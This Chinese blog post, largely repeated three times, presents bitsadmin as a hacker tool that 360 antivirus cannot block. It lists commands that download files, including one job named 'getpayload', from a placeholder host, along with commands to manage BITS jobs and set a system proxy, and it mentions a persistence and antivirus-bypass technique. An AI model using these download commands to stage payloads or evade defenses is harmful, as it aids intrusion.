原创 海阳顶端
海阳顶端头条号,专注于黑客知识普及,提高大众网络安全意识。有趣的命令行系列,这是第十四篇。自Win7开始系统默认包含Bitsadmin,是一个命令行工具,可用于创建下载或上载作业并监视其进度。它也可通过powershell调用,名称为BITS cmdlets。但是这个命令,黑客们发现了它的一些强大功能,本文介绍一下。
一、Bitsadmin 下载文件命令示例
我在WIN10下,Bitsadmin版本为3.0,这个命令太复杂了,如果介绍完估计能写一本书,光是它的参数就够让你头疼的。
不过我们化繁为简,只提取几个我们能需要的命令。黑客渗透测试当中,最常干的事就是上传下载了。Bitsadmin下载文件有多种方法,你只需掌握一种就行,下边我给你列出四种下载方法:
1.bitsadmin /rawreturn /transfer getfile http://url/files/PSTools.zip c:p.zip
2.bitsadmin /rawreturn /transfer getpayload http://url/files/PSTools.zip c:p.zip
3.bitsadmin /transfer myDownLoadJob /download /priority normal "http://url/PSTools.zip" "c:p.zip"
第3条命令带进度条。
多条命令合起来下载
4.bitsadmin /create myDownloadJob
bitsadmin /addfile myDownloadJob http://url c:lcx.zip
bitsadmin /resume myDownloadJob
bitsadmin /info myDownloadJob /verbose
bitsadmin /complete myDownloadJob
我以第一种方法示例抓图:
二、Bitsadmin查看和取消下载任务
在第一步的第4条中,我们建立了myDownloadJob任务。如何查看本机的任务和取消任务呢?
列出所有任务:
bitsadmin /list /allusers /verbose#如果列所有用户需管理员权限
删除某个任务:
bitsadmin /cancel
上图中我只是个测试图,我并没有建立myDownloadJob任务。
三、设置全局HTTP(S)代理
微软给出的具体示例是:
bitsadmin /util /setieproxy localsystem AUTODETECT
bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1,proxy2,proxy3 NULL
bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1:80 ""
下图是在我的WIN10本机下执行的命令:
bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 "local"。
还有其它设置的命令如下,可以自己试一下。
bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 “”
bitsadmin /util /setIEproxy localservice MANUAL_PROXY 10.1.1.20:8080 “”
bitsadmin /util /setIEproxy networkservice MANUAL_PROXY 10.1.1.20:8080 “”
显示本机代理和取消本机代理的命令。
1.Bitsadmin /util /getIEproxy localservice
2.bitsadmin /util /setIEproxy localservice NO_PROXY
有趣的命令行系列——360安全卫士都拦不住的黑客命令bitsadmin
原创 海阳顶端 2017-12-14 07:31:05
海阳顶端头条号,专注于黑客知识普及,提高大众网络安全意识。有趣的命令行系列,这是第十四篇。自Win7开始系统默认包含Bitsadmin,是一个命令行工具,可用于创建下载或上载作业并监视其进度。它也可通过powershell调用,名称为BITS cmdlets。但是这个命令,黑客们发现了它的一些强大功能,本文介绍一下。
一、Bitsadmin 下载文件命令示例
我在WIN10下,Bitsadmin版本为3.0,这个命令太复杂了,如果介绍完估计能写一本书,光是它的参数就够让你头疼的。
不过我们化繁为简,只提取几个我们能需要的命令。黑客渗透测试当中,最常干的事就是上传下载了。Bitsadmin下载文件有多种方法,你只需掌握一种就行,下边我给你列出四种下载方法:
1.bitsadmin /rawreturn /transfer getfile http://url/files/PSTools.zip c:p.zip
2.bitsadmin /rawreturn /transfer getpayload http://url/files/PSTools.zip c:p.zip
3.bitsadmin /transfer myDownLoadJob /download /priority normal "http://url/PSTools.zip" "c:p.zip"
第3条命令带进度条。
多条命令合起来下载
4.bitsadmin /create myDownloadJob
bitsadmin /addfile myDownloadJob http://url c:lcx.zip
bitsadmin /resume myDownloadJob
bitsadmin /info myDownloadJob /verbose
bitsadmin /complete myDownloadJob
我以第一种方法示例抓图:
二、Bitsadmin查看和取消下载任务
在第一步的第4条中,我们建立了myDownloadJob任务。如何查看本机的任务和取消任务呢?
列出所有任务:
bitsadmin /list /allusers /verbose#如果列所有用户需管理员权限
删除某个任务:
bitsadmin /cancel
上图中我只是个测试图,我并没有建立myDownloadJob任务。
三、设置全局HTTP(S)代理
微软给出的具体示例是:
bitsadmin /util /setieproxy localsystem AUTODETECT
bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1,proxy2,proxy3 NULL
bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1:80 ""
下图是在我的WIN10本机下执行的命令:
bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 "local"。
还有其它设置的命令如下,可以自己试一下。
bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 “”
bitsadmin /util /setIEproxy localservice MANUAL_PROXY 10.1.1.20:8080 “”
bitsadmin /util /setIEproxy networkservice MANUAL_PROXY 10.1.1.20:8080 “”
显示本机代理和取消本机代理的命令。
1.Bitsadmin /util /getIEproxy localservice
2.bitsadmin /util /setIEproxy localservice NO_PROXY
有趣的命令行系列——360安全卫士都拦不住的黑客命令bitsadmin
原创 海阳顶端 2017-12-14 07:31:05
海阳顶端头条号,专注于黑客知识普及,提高大众网络安全意识。有趣的命令行系列,这是第十四篇。自Win7开始系统默认包含Bitsadmin,是一个命令行工具,可用于创建下载或上载作业并监视其进度。它也可通过powershell调用,名称为BITS cmdlets。但是这个命令,黑客们发现了它的一些强大功能,本文介绍一下。
一、Bitsadmin 下载文件命令示例
我在WIN10下,Bitsadmin版本为3.0,这个命令太复杂了,如果介绍完估计能写一本书,光是它的参数就够让你头疼的。
不过我们化繁为简,只提取几个我们能需要的命令。黑客渗透测试当中,最常干的事就是上传下载了。Bitsadmin下载文件有多种方法,你只需掌握一种就行,下边我给你列出四种下载方法:
1.bitsadmin /rawreturn /transfer getfile http://url/files/PSTools.zip c:p.zip
2.bitsadmin /rawreturn /transfer getpayload http://url/files/PSTools.zip c:p.zip
3.bitsadmin /transfer myDownLoadJob /download /priority normal "http://url/PSTools.zip" "c:p.zip"
第3条命令带进度条。
多条命令合起来下载
4.bitsadmin /create myDownloadJob
bitsadmin /addfile myDownloadJob http://url c:lcx.zip
bitsadmin /resume myDownloadJob
bitsadmin /info myDownloadJob /verbose
bitsadmin /complete myDownloadJob
我以第一种方法示例抓图:
二、Bitsadmin查看和取消下载任务
在第一步的第4条中,我们建立了myDownloadJob任务。如何查看本机的任务和取消任务呢?
列出所有任务:
bitsadmin /list /allusers /verbose#如果列所有用户需管理员权限
删除某个任务:
bitsadmin /cancel
上图中我只是个测试图,我并没有建立myDownloadJob任务。
三、设置全局HTTP(S)代理
微软给出的具体示例是:
bitsadmin /util /setieproxy localsystem AUTODETECT
bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1,proxy2,proxy3 NULL
bitsadmin /util /setieproxy localsystem MANUAL_PROXY proxy1:80 ""
下图是在我的WIN10本机下执行的命令:
bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 "local"。
还有其它设置的命令如下,可以自己试一下。
bitsadmin /util /setIEproxy localsystem MANUAL_PROXY 10.1.1.20:8080 “”
bitsadmin /util /setIEproxy localservice MANUAL_PROXY 10.1.1.20:8080 “”
bitsadmin /util /setIEproxy networkservice MANUAL_PROXY 10.1.1.20:8080 “”
显示本机代理和取消本机代理的命令。
1.Bitsadmin /util /getIEproxy localservice
2.bitsadmin /util /setIEproxy localservice NO_PROXY
三、Bitsadmin过360主防加启动项
这个功能我以前用了好久,不过后来被黑客3gstudent公布了,所以本文我也就不写了。具体细节你可以百度搜索《Use bitsadmin to maintain persistence and bypass Autoruns》这篇文章。这个方法一公布出来就被封了,再是用这种方法有个90天的限制的。
图文来自网络 侵删
领取专属 10元无门槛券
私享最新 技术干货